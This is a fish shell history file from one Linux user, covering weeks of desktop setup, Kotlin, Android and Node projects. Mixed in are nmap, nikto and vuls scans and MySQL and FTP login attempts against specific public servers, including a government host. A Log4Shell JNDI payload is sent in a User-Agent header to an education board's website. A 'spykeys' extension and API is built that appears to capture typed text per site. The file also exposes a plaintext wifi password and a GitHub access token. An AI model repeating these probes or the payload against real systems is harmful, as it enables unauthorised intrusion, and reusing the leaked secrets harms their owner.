- cmd: source ~/.zshrc
  when: 1636532848
- cmd: sudo nano ~/.zshrc
  when: 1636532848
- cmd: source $ZSH/oh-my-zsh.sh
  when: 1636532848
- cmd: source ~/.oh-my-zsh/oh-my-zsh.sh
  when: 1636532848
- cmd: xfce4-terminal --preferences
  when: 1636532848
- cmd: zsh -c "source ~/.zshrc;"
  when: 1636532848
- cmd: omf install spacefsh
  when: 1636532923
- cmd: sudo omf install spacefsh
  when: 1636532972
- cmd: omf install spacefish
  when: 1636532980
- cmd: omf install https://github.com/cgestes/spaceFish\n
  when: 1636533046
- cmd: echo raz0229
  when: 1636533076
- cmd: ~ chsh -s /bin/fish
  when: 1636533150
  paths:
    - /bin/fish
- cmd: which fish
  when: 1636533165
- cmd: ~ chsh -s /usr/bin/fish
  when: 1636533176
  paths:
    - /usr/bin/fish
- cmd: sudo nano config.fish
  when: 1636533557
  paths:
    - config.fish
- cmd: cat omf.fish
  when: 1636533582
  paths:
    - omf.fish
- cmd: sudo nano init.fish
  when: 1636533645
  paths:
    - init.fish
- cmd: omf themes
  when: 1636533904
- cmd: omf install batman
  when: 1636533937
- cmd: omf theme random
  when: 1636533996
- cmd: omf theme batman
  when: 1636534000
- cmd: omf theme
  when: 1636534022
- cmd: omf theme -s batman
  when: 1636534038
- cmd: omf install randomrussel
  when: 1636534081
- cmd: omf install random
  when: 1636534122
- cmd: omf uninstall random
  when: 1636534151
- cmd: omf theme randomrussel
  when: 1636534159
- cmd: pacman -S toilet
  when: 1636534592
- cmd: sudo pacman -S toilet
  when: 1636534595
- cmd: localectl set-locale LANG=en_AU.UTF-8
  when: 1636534769
- cmd: localectl set-locale LANG=en_US.UTF-8
  when: 1636534778
- cmd: export PATH=$PATH:/home/raz0229/Downloads/firefox
  when: 1636534835
- cmd: export "PATH=$PATH:/home/raz0229/Downloads/firefox"
  when: 1636534868
- cmd: echo .
  when: 1636535095
- cmd: echo.
  when: 1636535099
- cmd: echo
  when: 1636535113
- cmd: sudo nano ~/.config/fish/functions/fish_greeting.fish
  when: 1636535115
  paths:
    - ~/.config/fish/functions/fish_greeting.fish
- cmd: zsh
  when: 1636535295
- cmd: sudo nano ~/.config/fish/config.fish
  when: 1636535329
  paths:
    - ~/.config/fish/config.fish
- cmd: cd /etc/profile.d/
  when: 1636535576
  paths:
    - /etc/profile.d/
- cmd: sudo nano env.sh
  when: 1636535584
- cmd: firefox
  when: 1636535620
- cmd: sudo nmap -O 148.251.12.170
  when: 1636611322
- cmd: sudo pacman -Ss libwebkit
  when: 1636611694
- cmd: cd ~/Downloads/
  when: 1636611922
  paths:
    - ~/Downloads/
- cmd: unzp VegaBuild-linux.gtk.x86_64.zip
  when: 1636611930
  paths:
    - VegaBuild-linux.gtk.x86_64.zip
- cmd: unzip VegaBuild-linux.gtk.x86_64.zip
  when: 1636611934
  paths:
    - VegaBuild-linux.gtk.x86_64.zip
- cmd: cd vega/
  when: 1636611940
  paths:
    - vega/
- cmd: ./vega
  when: 1636611970
- cmd: sudo chmod +x Vega
  when: 1636611985
  paths:
    - Vega
- cmd: sudo ./vega
  when: 1636611987
- cmd: ./Vega
  when: 1636612010
- cmd: cat ./configuration/1636612014348.log
  when: 1636612045
  paths:
    - ./configuration/1636612014348.log
- cmd: docker install vega
  when: 1636612231
- cmd: docker --help
  when: 1636612244
- cmd: docker pull Vega
  when: 1636612316
  paths:
    - Vega
- cmd: sudo systemctl start docker.service
  when: 1636612343
- cmd: docker pull vega
  when: 1636612363
- cmd: sudo docker pull vega
  when: 1636612370
- cmd: sudo docker pull subgraph/vega
  when: 1636612488
- cmd: sudo docker pull subgraph/Vega
  when: 1636612498
- cmd: yay -S nikto
  when: 1636612751
- cmd: nikto -h 148.251.12.170 -ssl
  when: 1636612838
- cmd: nano hello.php
  when: 1636613428
- cmd: docker pull vuls/vuls
  when: 1636614140
- cmd: sudo docker pull vuls/vuls
  when: 1636614145
- cmd: sudo docker run vuls scan 148.251.12.170
  when: 1636617853
- cmd: sudo docker run vuls/vuls scan 148.251.12.170
  when: 1636617866
- cmd: docker
  when: 1636617903
- cmd: docker run vuls/vuls
  when: 1636617920
- cmd: sudo docker run vuls/vuls
  when: 1636617924
- cmd: sudo nmap -Pn 148.251.12.170
  when: 1636618047
- cmd: ftp 148.251.12.170
  when: 1636618079
- cmd: mysql -h 148.251.12.170 -u root -p
  when: 1636618543
- cmd: ping http://111.119.187.61/
  when: 1636618634
- cmd: ping 111.119.187.61
  when: 1636618639
- cmd: mysql -h 111.119.187.61 -u admin
  when: 1636618686
- cmd: mysql -h 148.251.12.170 -u admin
  when: 1636618740
- cmd: mysql -h 148.251.12.170 -u admin -p
  when: 1636618744
- cmd: yay -S postman
  when: 1636621069
- cmd: yay -S burpsuite
  when: 1636711638
- cmd: yay -Ss ncurses
  when: 1636806970
- cmd: yay -S zlib.i686 ncurses-libs.i686 bzip2-libs.i686
  when: 1636807003
- cmd: yay -Ss ncurses | grep i686
  when: 1636807030
- cmd: yay -Ss ncurses | grep i386
  when: 1636807044
- cmd: yay -Ss ncurses | grep lib
  when: 1636807055
- cmd: tar -xvf android-studio-2020.3.1.25-linux.tar.gz
  when: 1636807240
  paths:
    - android-studio-2020.3.1.25-linux.tar.gz
- cmd: egrep -c '(vmx|svm)' /proc/cpuinfo
  when: 1636807885
  paths:
    - /proc/cpuinfo
- cmd: yay -S cpu-checker
  when: 1636807914
- cmd: sudo pacman -S cpu-checker
  when: 1636808436
- cmd: grep -E --color=auto 'vmx|svm|0xc0f' /proc/cpuinfo
  when: 1636808559
  paths:
    - /proc/cpuinfo
- cmd: zgrep CONFIG_KVM /proc/config.gz
  when: 1636808588
  paths:
    - /proc/config.gz
- cmd: lsmod | grep kvm\n
  when: 1636808604
- cmd: sudo pacman -S virt-manager qemu vde2 ebtables dnsmasq bridge-utils openbsd-netcat --needed
  when: 1636808652
- cmd: nmap 148.251.12.170
  when: 1636818731
- cmd: nmap -Pn 148.251.12.170
  when: 1636818766
- cmd: postman
  when: 1636819378
- cmd: sudo postman
  when: 1636819404
- cmd: code bisemultan.html
  when: 1636820465
  paths:
    - bisemultan.html
- cmd: sudo pacman -S virt-manager qemu vde2 ebtables dnsmasq bridge-utils openbsd-netcat\n
  when: 1636910888
- cmd: sudo systemctl enable libvirtd.service
  when: 1636910967
- cmd: sudo systemctl start libvirtd.service
  when: 1636910974
- cmd: sudo nano /etc/libvirt/libvirtd.conf
  when: 1636911029
  paths:
    - /etc/libvirt/libvirtd.conf
- cmd: sudo usermod -a -G libvirt '(whoami)'
  when: 1636911182
- cmd: sudo usermod -a -G libvirt (whoami)
  when: 1636911196
- cmd: echo (whoami)
  when: 1636911205
- cmd: newgrp libvirt
  when: 1636911217
- cmd: sudo systemctl restart libvirtd.service
  when: 1636911230
- cmd: Android/
  when: 1636990022
- cmd: cd ~/Downloads/android-studio/
  when: 1636990045
  paths:
    - ~/Downloads/android-studio/
- cmd: cd bin
  when: 1636990047
  paths:
    - bin
- cmd: sudo ./studio.sh
  when: 1636990053
  paths:
    - ./studio.sh
- cmd: ln -s ./studio.sh android-studio
  when: 1636990767
  paths:
    - ./studio.sh
- cmd: ./android-studio
  when: 1636990845
- cmd: export "PATH=$PATH:/home/raz0229/Downloads/android-studio/bin"
  when: 1636991163
- cmd: sudo cp firefox.desktop android-studio.desktop
  when: 1636991243
  paths:
    - firefox.desktop
- cmd: sudo nano android-studio.desktop
  when: 1636991255
  paths:
    - android-studio.desktop
- cmd: sudo nano /etc/profile.d/env.sh
  when: 1636991493
  paths:
    - /etc/profile.d/env.sh
- cmd: yay -S kotlin
  when: 1637077201
- cmd: mkdir ~/Documents/kotlin_projects
  when: 1637077797
- cmd: mkdir ~/Documents/kotlin_projects/first
  when: 1637077804
- cmd: /home/raz0229/Documents/kotlin_projects/first/hello.kt
  when: 1637077881
- cmd: kotlin helloKt.class
  when: 1637077974
- cmd: java HelloKt.class
  when: 1637078010
  paths:
    - HelloKt.class
- cmd: kotlin hello
  when: 1637078100
- cmd: kotlinc hello
  when: 1637078110
- cmd: ./Hellokt.class
  when: 1637078159
- cmd: sudo ./Hellokt.class
  when: 1637078165
- cmd: kotlin hello.kt
  when: 1637078207
  paths:
    - hello.kt
- cmd: kotlinc hello.kt
  when: 1637078251
  paths:
    - hello.kt
- cmd: kotlin
  when: 1637078273
- cmd: java -jar hello.jar
  when: 1637078491
  paths:
    - hello.jar
- cmd: java hello.jar
  when: 1637164978
  paths:
    - hello.jar
- cmd: java first.jar
  when: 1637165039
  paths:
    - first.jar
- cmd: kotlinc first.kt -d first.jar
  when: 1637165059
  paths:
    - first.kt
- cmd: kotlinc hello.kt -d hello.jar
  when: 1637165241
  paths:
    - hello.kt
- cmd: kotlin hello.jar
  when: 1637165247
  paths:
    - hello.jar
- cmd: ani-cli
  when: 1637768994
- cmd: cd ~/Documents
  when: 1637822272
  paths:
    - ~/Documents
- cmd: mkdir pirate-tv
  when: 1637822406
- cmd: cd pirate-tv/
  when: 1637822413
  paths:
    - pirate-tv/
- cmd: git clone https://github.com/daniel-schroeder-io/Node-Express-API-Template.git
  when: 1637822419
- cmd: cd Node-Express-API-Template/
  when: 1637822489
  paths:
    - Node-Express-API-Template/
- cmd: sudo rm -rf Node-Express-API-Template
  when: 1637822511
  paths:
    - Node-Express-API-Template
- cmd: sudo npm install
  when: 1637822518
- cmd: sudo npm start
  when: 1637822955
- cmd: git clone https://github.com/gokugoku123/project-starter-template.git /
  when: 1637823564
  paths:
    - /
- cmd: git clone https://github.com/gokugoku123/project-starter-template.git ./
  when: 1637823568
  paths:
    - ./
- cmd: cat package
  when: 1637823608
- cmd: npm test
  when: 1637823633
- cmd: npm i nodemon --save
  when: 1637824203
- cmd: npm start
  when: 1637824247
- cmd: unzip starter-template.zip
  when: 1637825471
  paths:
    - starter-template.zip
- cmd: cd starter-template/
  when: 1637825482
  paths:
    - starter-template/
- cmd: xrandr
  when: 1637861741
- cmd: feh
  when: 1638026921
- cmd: feh ~/Pictures/cosmos.jpg
  when: 1638026930
  paths:
    - ~/Pictures/cosmos.jpg
- cmd: mv cosmos0.jpg cosmos.jpg
  when: 1638027429
  paths:
    - cosmos0.jpg
    - cosmos.jpg
- cmd: sudo pacman -S cowsays
  when: 1638027488
- cmd: yay -S cowsays
  when: 1638027496
- cmd: sudo pacman -S cowsay
  when: 1638027507
- cmd: sudo pacman -S fortune
  when: 1638027549
- cmd: yay -S fortune
  when: 1638027558
- cmd: sudo pacman -Ss fortune
  when: 1638027591
- cmd: sudo pacman -S cowfortune
  when: 1638027609
- cmd: cowfortune
  when: 1638027911
- cmd: nmcli device wifi connect raz0229 passsword 229rajazafarpotspotNEW0123456789
  when: 1638029087
- cmd: yay -Ss snort
  when: 1638811048
- cmd: yay -S snort
  when: 1638811065
- cmd: apt-cache policy libpcap0.8-dev
  when: 1638812260
- cmd: sudo pacman -S libpcap0.8-dev --needed
  when: 1638812289
- cmd: sudo pacman -Ss libpcap
  when: 1638812305
- cmd: sudo pacman -Ss libpcre
  when: 1638812319
- cmd: mkdir hello2 hello3
  when: 1638813116
- cmd: sudo rm -rf ~/.cache/Google/
  when: 1638883039
  paths:
    - ~/.cache/Google/
- cmd: ls --help
  when: 1638883347
- cmd: ls -l ~/.cache/Google/
  when: 1638883395
  paths:
    - ~/.cache/Google/
- cmd: ls -l ~/.cache/Google/Andr*/
  when: 1638883423
- cmd: cd ~/.cache/Google/AndroidStudio2020.3/
  when: 1638883473
  paths:
    - ~/.cache/Google/AndroidStudio2020.3/
- cmd: chmod +rwx icons-v2.db
  when: 1638883480
  paths:
    - icons-v2.db
- cmd: chmod 755 icons-v2.db
  when: 1638883566
  paths:
    - icons-v2.db
- cmd: chmod 755 ./
  when: 1638883592
  paths:
    - ./
- cmd: chmod 755 AndroidStudio2020.3
  when: 1638883609
  paths:
    - AndroidStudio2020.3
- cmd: cd AndroidStudio2020.3/
  when: 1638883614
  paths:
    - AndroidStudio2020.3/
- cmd: chmod 775 */
  when: 1638883677
- cmd: chmod 755 */
  when: 1638883698
- cmd: chmod -R 775 icons-v2.db
  when: 1638883800
  paths:
    - icons-v2.db
- cmd: chmod -R 755 icons-v2.db
  when: 1638883811
  paths:
    - icons-v2.db
- cmd: chmod g-rx,o+rx icons-v2.db
  when: 1638883884
  paths:
    - icons-v2.db
- cmd: sudo chmod -R 755 icons-v2.db
  when: 1638883903
  paths:
    - icons-v2.db
- cmd: ls -l
  when: 1638883909
- cmd: cler
  when: 1638884052
- cmd: sudo rm -rf ~/.cache/Google/AndroidStudio2020.3/
  when: 1638884183
  paths:
    - ~/.cache/Google/AndroidStudio2020.3/
- cmd: android-studio
  when: 1638887391
- cmd: ping ppsc.gop.pk
  when: 1639066027
- cmd: nmap -Pn 103.226.216.201
  when: 1639066060
- cmd: ftp 103.226.216.201
  when: 1639066093
- cmd: adb devices
  when: 1639130957
- cmd: xbindkeys --quit
  when: 1639154049
- cmd: kill 2542
  when: 1639154066
- cmd: find -name Mid.pdf
  when: 1639328826
  paths:
    - Mid.pdf
- cmd: cd Music
  when: 1639328833
  paths:
    - Music
- cmd: cd vega
  when: 1639328851
  paths:
    - vega
- cmd: find -name Vega.ini
  when: 1639328871
- cmd: find -name ds.py
  when: 1639328883
- cmd: nano add.asm
  when: 1639400266
- cmd: mv add.asm /ass
  when: 1639400380
  paths:
    - add.asm
- cmd: sudo mv add.asm /ass
  when: 1639400383
  paths:
    - add.asm
- cmd: dir
  when: 1639400405
- cmd: ls | grep add
  when: 1639400422
- cmd: ;s
  when: 1639400452
- cmd: touch add.asm
  when: 1639400462
- cmd: cd ../Downloads
  when: 1639400603
  paths:
    - ../Downloads
- cmd: cd masm
  when: 1639400641
  paths:
    - masm
- cmd: mkdir ass
  when: 1639400669
- cmd: sudo mv ~/ass/add.asm ass
  when: 1639400683
  paths:
    - ~/ass/add.asm
    - ass
- cmd: cd ass
  when: 1639400686
  paths:
    - ass
- cmd: sudo nano hello.asm
  when: 1639408918
- cmd: sudo nano ../hello.asm
  when: 1639409067
  paths:
    - ../hello.asm
- cmd: sudo nano add.asm
  when: 1639409131
  paths:
    - add.asm
- cmd: ls -l | grep api
  when: 1639486953
- cmd: sudo mv api\\ cnic\\ front.png api\\ cnic\\ front.jpg
  when: 1639487185
  paths:
    - api\\ cnic\\ front.png
- cmd: sudo mv api\\ pfp\\ front.png api\\ pfp\\ front.jpg
  when: 1639487199
  paths:
    - api\\ pfp\\ front.png
- cmd: sudo mv ppsc\\ challan\\ form.png ppsc\\ challan\\ form.jpg
  when: 1639487517
  paths:
    - ppsc\\ challan\\ form.png
- cmd: sudo wget http://masm32.masmcode.com/masm32/masm32v11r.zip
  when: 1639489380
- cmd: sudo unzip masm32v11r.zip
  when: 1639489405
  paths:
    - masm32v11r.zip
- cmd: dosbox
  when: 1639489450
- cmd: yay -S dosemu
  when: 1639490154
- cmd: kill 2130
  when: 1639490204
- cmd: dosemu
  when: 1639490505
- cmd: unzip gta.zip
  when: 1639490745
  paths:
    - gta.zip
- cmd: cd GTA24/
  when: 1639490837
  paths:
    - GTA24/
- cmd: dosbox GTA.BAT -fullscreen
  when: 1639490848
  paths:
    - GTA.BAT
- cmd: curl https://web.bisemultan.edu.pk -A '${jndi:ldap://127.0.0.1:1111/Basic/Command/start www.google.com}' > bisemultan.html
  when: 1639499372
- cmd: curl https://web.bisemultan.edu.pk -A '${jndi:ldap://127.0.0.1:1111/Basic/Command/start www.google.com}'
  when: 1639499383
- cmd: mkdir spykeys
  when: 1639556223
- cmd: git clone git@github.com:edrpls/chrome-extension-template.git name-of-your-project
  when: 1639556229
- cmd: git clone https://github.com/edrpls/chrome-extension-template.git
  when: 1639556308
- cmd: sudo mv * ../
  when: 1639556342
  paths:
    - ../
- cmd: cd .. && rm -f chrome-extension-template
  when: 1639556362
  paths:
    - ..
- cmd: cd .. && rm -d chrome-extension-template
  when: 1639556369
  paths:
    - ..
    - chrome-extension-template
- cmd: cd spykeys
  when: 1639556390
  paths:
    - spykeys
- cmd: rm -d chrome-extension-template
  when: 1639556394
  paths:
    - chrome-extension-template
- cmd: cd chrome-extension-template/
  when: 1639556402
  paths:
    - chrome-extension-template/
- cmd: ls -a
  when: 1639556405
- cmd: cd ..
  when: 1639556467
  paths:
    - ..
- cmd: npm view event-stream
  when: 1639556811
- cmd: git clone https://github.com/TSheetsTeam/Chrome-Extension-Template.git ./
  when: 1639556922
  paths:
    - ./
- cmd: cat README.md
  when: 1639556954
  paths:
    - README.md
- cmd: vlc ~/Downloads/Video/22e90e759fe7533c69b9ddb94b702c23-360p.mp4.mp4
  when: 1639581494
  paths:
    - ~/Downloads/Video/22e90e759fe7533c69b9ddb94b702c23-360p.mp4.mp4
- cmd: kill 8068
  when: 1639673559
- cmd: mkdir spykeys-web
  when: 1639676408
- cmd: git clone https://github.com/Youngestdev/svelte-continent-app.git ./
  when: 1639676426
  paths:
    - ./
- cmd: curl --header "x-api-key: 123" http://localhost:8081/orders
  when: 1639746277
- cmd: npm install --save nodemon
  when: 1639746485
- cmd: curl --header "x-api-key: 123" http://localhost:8081/sendkeys
  when: 1639746867
- cmd: curl --header "x-api-key: 1csxcrt3454623" http://localhost:8081/sendkeys
  when: 1639746875
- cmd: npm install --save firebase
  when: 1639755964
- cmd: npm install --global node
  when: 1639761201
- cmd: sudo npm install --global node
  when: 1639761220
- cmd: sudo npm install --global --force node
  when: 1639761299
- cmd: npm view firebase
  when: 1639761872
- cmd: npm install firebase
  when: 1639761940
- cmd: npm i firebase@9.0.0-beta.6
  when: 1639762144
- cmd: npm i firebase@9.0.0
  when: 1639762579
- cmd: sudo rm -rf node_modules
  when: 1639762698
  paths:
    - node_modules
- cmd: ckear
  when: 1639763899
- cmd: npm uninstall firebase
  when: 1639804851
- cmd: cd api/
  when: 1639805058
  paths:
    - api/
- cmd: npm install firebase-admin
  when: 1639805078
- cmd: curl http://localhost:8081/sendkeys
  when: 1639806098
- cmd: curl http://localhost:8081/gennew
  when: 1639806119
- cmd: curl -d "sadasdas" -X POST http://localhost.com/verify
  when: 1639808862
- cmd: curl -d "sadasdas" -X POST http://localhost:8081/verify
  when: 1639808870
- cmd: curl -F "sadasdas" -X POST http://localhost:8081/verify
  when: 1639808971
- cmd: curl -d "sadasdas: apiKey" -X POST http://localhost:8081/verify
  when: 1639808996
- cmd: curl -d "8ff66940-a9b9-4816-b8c6-d98da6c" -X POST http://localhost:8081/verify
  when: 1639824146
- cmd: curl -d "apiKey=8ff66940-a9b9-4816-b8c6-d98da6c" -X POST http://localhost:8081/verify
  when: 1639824395
- cmd: curl -d "apiKey=8ff66940-a9b9-4816-b8c6-d98da6c10c4" -X POST http://localhost:8081/verify
  when: 1639824438
- cmd: curl -d "apiKey=sdadasdasd" -X POST http://localhost:8081/verify
  when: 1639824752
- cmd: curl  POST http://localhost:8081
  when: 1639827694
- cmd: curl http://localhost:8081
  when: 1639827699
- cmd: curl -d "apiKey=8ff66940-a9b9-4816-b8c6-d98da6c10c04" -X POST http://localhost:8081/verify
  when: 1639827703
- cmd: curl -d "apiKey=8ff66940-a9b9-4816-b8c6-d98da6c10c0" -X POST http://localhost:8081/verify
  when: 1639827711
- cmd: curl -d "apiKey=1bdb698a-66f8-4448-b198-c2b485b5ce6" -X POST http://localhost:8081/verify
  when: 1639827789
- cmd: curl -d "apiKey=1bdb698a-66f8-4448-b198-c2b485b5cea63" -X POST http://localhost:8081/verify
  when: 1639835397
- cmd: curl http://localhost:8081/verify
  when: 1639835623
- cmd: curl -d "apiKey=1bdb698a-66f8-4448-b198-c2b485b5cea6" -X POST http://localhost:8081/verify
  when: 1639837038
- cmd: curl -d "apiKey=1bdb698a-66f8-4448-b198-c2b485b5cea6" -X POST http://localhost:8081/submit
  when: 1639837056
- cmd: curl -d "apiKey=0d3e3ffc-58dd-428b-a7aa-63b4719572c" -X POST http://localhost:8081/submit
  when: 1639840687
- cmd: curl -d "apiKey=0d3e3ffc-58dd-428b-a7aa-63b4719572cf" -X POST http://localhost:8081/submit
  when: 1639840692
- cmd: curl -d "apiKey=0d3e3ffc-58dd-428b-a7aa-63b4719572cf&text=hello229,sd34&domain=www.facebook.com&timestamp=34323454356" -X POST http://localhost:8081/submit
  when: 1639842685
- cmd: curl -X POST http://localhost:8081/submit
  when: 1639842766
- cmd: curl -d "apiKey=0d3e3ffc-58dd-428b-a7aa-63b4719572cf&text=hello229,sd34&domain=www.facebook.com" -X POST http://localhost:8081/submit
  when: 1639842826
- cmd: curl http://localhost:8081/submit
  when: 1639842904
- cmd: curl -d "apiKey=0d3e3ffc-58dd-428b-a7aa-63b4719572cf&text=hello229,sd34&domain=www.instagram.com" -X POST http://localhost:8081/submit
  when: 1639842917
- cmd: curl --header="x-api-key: 123" -d "&text=hello229,sd34&domain=www.instagram.com" -X POST http://localhost:8081/submit
  when: 1639844775
- cmd: curl --header "x-api-key: 123" -d "&text=hello229,sd34&domain=www.instagram.com" -X POST http://localhost:8081/submit
  when: 1639844795
- cmd: curl --header "x-api-key: 0d3e3ffc-58dd-428b-a7aa-63b4719572cf" -d "&text=hahaha,sd34&domain=www.instagram.com" -X POST http://localhost:8081/submit
  when: 1639844863
- cmd: curl --header "x-api-key: 0d3e3ffc-58dd-428b-a7aa-63b4719572cf" -d "text=new" -X POST http://localhost:8081/submit
  when: 1639846895
- cmd: curl --header "x-api-key: 0d3e3ffc-58dd-428b-a7aa-63b4719572cf" -d "text=00000000000000000new" -X POST http://localhost:8081/submit
  when: 1639892471
- cmd: curl --header "x-api-key: 58dd-428b-a7aa-63b4719572cf" -d "text=00000000000000000new" -X POST http://localhost:8081/submit
  when: 1639921546
- cmd: curl --header "x-api-key: 875248f2-a967-4062-b866-02d9683a1b6d" -d "text=00000000000000000new" -X POST http://localhost:8081/submit
  when: 1639922813
- cmd: cat First.svelte
  when: 1639994901
  paths:
    - First.svelte
- cmd: cat First.svelte | grep persistent
  when: 1639994926
  paths:
    - First.svelte
- cmd: cat Home.svelte | grep persistent
  when: 1639994931
  paths:
    - Home.svelte
- cmd: cd ~/Documents/fine-tailors/
  when: 1639995003
  paths:
    - ~/Documents/fine-tailors/
- cmd: cd src/
  when: 1639995005
  paths:
    - src/
- cmd: cd views/
  when: 1639995008
  paths:
    - views/
- cmd: head Home.svelte
  when: 1639995014
  paths:
    - Home.svelte
- cmd: cat Home.svelte
  when: 1639995020
  paths:
    - Home.svelte
- cmd: npm install helmet
  when: 1640015087
- cmd: npm install express-limiter redis
  when: 1640017102
- cmd: git add -A
  when: 1640021660
- cmd: touch Procfile
  when: 1640021749
- cmd: nano Procfile
  when: 1640021753
  paths:
    - Procfile
- cmd: git add Procfile
  when: 1640021763
  paths:
    - Procfile
- cmd: git commit -m "added API"
  when: 1640021822
- cmd: git remote add origin https://github.com/raz0229/api-spykeys.git
  when: 1640021921
- cmd: node app.js
  when: 1640022606
  paths:
    - app.js
- cmd: heroku logs --tail
  when: 1640022847
- cmd: cd ~/Documents/pirate-tv/
  when: 1640081419
  paths:
    - ~/Documents/pirate-tv/
- cmd: kill 5706
  when: 1640086341
- cmd: pidof xbindkeys
  when: 1640092042
- cmd: kill 9611
  when: 1640092046
- cmd: cd ~/Documents/spykeys-web/api/
  when: 1640101177
  paths:
    - ~/Documents/spykeys-web/api/
- cmd: cd ~/Documents/spykeys-web/a
  when: 1640153361
- cmd: npm i use-chrome-storage
  when: 1640238966
- cmd: npm uninstall use-chrome-storage
  when: 1640239219
- cmd: unzip mater*
  when: 1640251593
- cmd: cd materialize/
  when: 1640251597
  paths:
    - materialize/
- cmd: thunar
  when: 1640251605
- cmd: cd ~/Pictures
  when: 1640361673
  paths:
    - ~/Pictures
- cmd: cp cat\\ pointing.png ~/Documents/spykeys/images/
  when: 1640361704
  paths:
    - ~/Documents/spykeys/images/
- cmd: cp cat_pointing.png ~/Documents/spykeys/images/
  when: 1640361744
  paths:
    - cat_pointing.png
    - ~/Documents/spykeys/images/
- cmd: nmcli con down raz0229
  when: 1640364285
- cmd: nmcli con down wlan0
  when: 1640364289
- cmd: nmcli con down wifi
  when: 1640364299
- cmd: heroku logs --tail --app api-spykeys
  when: 1640365144
- cmd: cd ~/Documents/spykeys/
  when: 1640436654
  paths:
    - ~/Documents/spykeys/
- cmd: killall -9 node
  when: 1640527906
- cmd: cd ~/Documents/spykeys-web
  when: 1640579038
  paths:
    - ~/Documents/spykeys-web
- cmd: npx degit sveltejs/template ./
  when: 1640579443
  paths:
    - ./
- cmd: npm run start:dev
  when: 1640580664
- cmd: npm i express
  when: 1640581640
- cmd: npm i path heroku-ssl-redirect
  when: 1640581681
- cmd: node server.js
  when: 1640581898
  paths:
    - server.js
- cmd: heroku local web
  when: 1640581999
- cmd: cd ~/Documents/spykeys-web/spykeys-web/
  when: 1640582100
  paths:
    - ~/Documents/spykeys-web/spykeys-web/
- cmd: git commit -m "added SpyKeys-frontend"
  when: 1640582224
- cmd: git remote add origin https://github.com/raz0229/spykeys-web.git
  when: 1640582244
- cmd: cd ~/Documents/spykeys-web/
  when: 1640620878
  paths:
    - ~/Documents/spykeys-web/
- cmd: npm run start
  when: 1640621215
- cmd: cd spykeys-web/
  when: 1640621972
  paths:
    - spykeys-web/
- cmd: git commit -m "fixed bug: scroll"
  when: 1640626235
- cmd: git commit -m "fixed bug: reload"
  when: 1640628384
- cmd: git remote set-url origin https://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@github.com/raz0229/spykeys-web.git
  when: 1640628387
- cmd: cd ~/Documents/spykeys
  when: 1640630607
  paths:
    - ~/Documents/spykeys
- cmd: git commit -m "added spykeys"
  when: 1640630692
- cmd: git remote set-url origin https://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@github.com/raz0229/spykeys-extension.git
  when: 1640630729
- cmd: cd ~/Android/Sdk/
  when: 1640665745
  paths:
    - ~/Android/Sdk/
- cmd: cd build-tools/
  when: 1640665768
  paths:
    - build-tools/
- cmd: la
  when: 1640665770
- cmd: xrandr -s 1280x1024
  when: 1640773032
- cmd: cd /home/raz0229/Downloads/android-studio/bin/
  when: 1640926396
  paths:
    - /home/raz0229/Downloads/android-studio/bin/
- cmd: ./studio.sh
  when: 1640926400
- cmd: iwconfig
  when: 1640952994
- cmd: iwconfig --help
  when: 1640952999
- cmd: iwconfig wlan0
  when: 1640953022
- cmd: iwconfig wlan0 mode monitor
  when: 1640953030
- cmd: sudo iwconfig wlan0 mode monitor
  when: 1640953038
- cmd: sudo pacman -S smartctl
  when: 1640956964
- cmd: sudo pacman -S smartmontools
  when: 1640957065
- cmd: smartctl -a /dev/sda
  when: 1640957118
  paths:
    - /dev/sda
- cmd: sudosmartctl -a /dev/sda
  when: 1640957122
  paths:
    - /dev/sda
- cmd: sudo smartctl -a /dev/sda | grep health
  when: 1640957166
  paths:
    - /dev/sda
- cmd: yay -S gnome-disk-utility
  when: 1640957432
- cmd: git clone https://github.com/GNOME/gnome-disk-utility.git
  when: 1640957777
- cmd: sudo pacman -Rsn gnome-disk-utility
  when: 1640957839
  paths:
    - gnome-disk-utility
- cmd: sudo smartctl /dev/sda
  when: 1640957900
  paths:
    - /dev/sda
- cmd: sudo smartctl -a /dev/sda
  when: 1640957908
  paths:
    - /dev/sda
- cmd: sudo smartctl --help
  when: 1640957919
- cmd: sudo smartctl --help | grep health
  when: 1640957926
- cmd: sudo smartctl --health /dev/sda
  when: 1640957938
  paths:
    - /dev/sda
- cmd: sudo gnome-disk-utility/
  when: 1640958029
  paths:
    - gnome-disk-utility/
- cmd: cd gnome-disk-utility/
  when: 1640958036
  paths:
    - gnome-disk-utility/
- cmd: sudo chmod +x INSTALL
  when: 1640958057
  paths:
    - INSTALL
- cmd: ./INSTALL
  when: 1640958068
- cmd: sudo pacman -S gnome-disks
  when: 1640958259
- cmd: sudo pacman -S gnome-disk-utility
  when: 1640958294
- cmd: sudo pacman -S gsmartcontrol
  when: 1640958325
- cmd: gsmartcontrol
  when: 1640958333
- cmd: dd if=/dev/sda of=/dev/sdb
  when: 1640961062
- cmd: sudo dd if=/dev/sda of=/dev/sdb
  when: 1640961066
- cmd: sudo kill -USR1 (pgrep ^dd)
  when: 1640970869
- cmd: nmcli device wifi connect raz0229 password 229rajazafarpotspotNEW0123456789
  when: 1640972557
- cmd: sudo mount /dev/sdb1 /mnt/media
  when: 1640972709
  paths:
    - /dev/sdb1
- cmd: sudo mount /dev/sdb1 /mnt/
  when: 1640972718
  paths:
    - /dev/sdb1
    - /mnt/
- cmd: fdisk -l /dev/sda /dev/sdb
  when: 1640973013
  paths:
    - /dev/sda
    - /dev/sdb
- cmd: sudo dd if=/dev/sda2 of=/dev/sdb2 status=progress conv=noerror,sync
  when: 1640983737
- cmd: sudo dd if=/dev/sda of=/dev/sdb status=progress conv=noerror,sync
  when: 1641002038
- cmd: unzip balena*
  when: 1641002528
- cmd: sudo chmod +x *.AppImage
  when: 1641002553
- cmd: sudo pacman -S dosfstools
  when: 1641002695
- cmd: sudo pacman -S mtools
  when: 1641002725
- cmd: sudo pacman -Ss policykit
  when: 1641003555
- cmd: cd ~/Downloads
  when: 1641003606
  paths:
    - ~/Downloads
- cmd: sudo ./balenaEtcher-1.7.3-x64.AppImage
  when: 1641003613
  paths:
    - ./balenaEtcher-1.7.3-x64.AppImage
- cmd: sudo fdisk -l /dev/sda /dev/sdb
  when: 1641007261
  paths:
    - /dev/sda
    - /dev/sdb
- cmd: sudo nano config.toml
  when: 1641007636
  paths:
    - config.toml
- cmd: mount
  when: 1641007877
- cmd: mount | grep sdb
  when: 1641007891
- cmd: sudo unmount /
  when: 1641007983
  paths:
    - /
- cmd: sudo pacman -S unmount
  when: 1641007997
- cmd: sudo umount /
  when: 1641008092
  paths:
    - /
- cmd: rofi-theme-selector
  when: 1644738107
- cmd: cd ~/.config/rofi/
  when: 1644738145
  paths:
